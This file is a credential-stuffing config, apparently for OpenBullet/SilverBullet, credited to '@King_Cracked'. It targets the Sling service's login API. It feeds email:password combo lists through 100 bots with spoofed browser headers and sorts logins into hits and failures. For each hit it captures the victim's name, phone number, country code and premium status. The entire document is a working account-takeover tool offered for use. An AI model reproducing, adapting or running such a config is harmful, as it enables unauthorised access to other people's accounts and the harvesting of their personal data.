[SETTINGS]
{
  "Name": "Sling 
By @King_Cracked",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-01T11:22:39.3423371+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@King_Cracked",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "sling",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#USER FUNCTION URLEncode "<USER>" -> VAR "USER" 

#PASS FUNCTION URLEncode "<PASS>" -> VAR "PASS" 

#LOGIN REQUEST POST "https://api.getsling.com/v1/account/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en" 
  HEADER "content-length: 62" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://login.getsling.com" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Sorry, we couldn't find an account matching <USER>" 
    KEY "Sorry, the email and password you've entered don't match" 
  KEYCHAIN Success OR 
    KEY "{\"id\":" 

#name PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "name" 

#lastname PARSE "<SOURCE>" JSON "lastname" CreateEmpty=FALSE -> CAP "lastname" 

#countryCode PARSE "<SOURCE>" JSON "countryCode" CreateEmpty=FALSE -> CAP "countryCode" 

#phone PARSE "<SOURCE>" JSON "phone" CreateEmpty=FALSE -> CAP "phone" 

#isPremium PARSE "<SOURCE>" JSON "isPremium" CreateEmpty=FALSE -> CAP "isPremium" 

#FREE KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"isPremium\": true," 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"isPremium\": false," 

#author FUNCTION Constant "@King_Cracked" -> CAP "configby" 

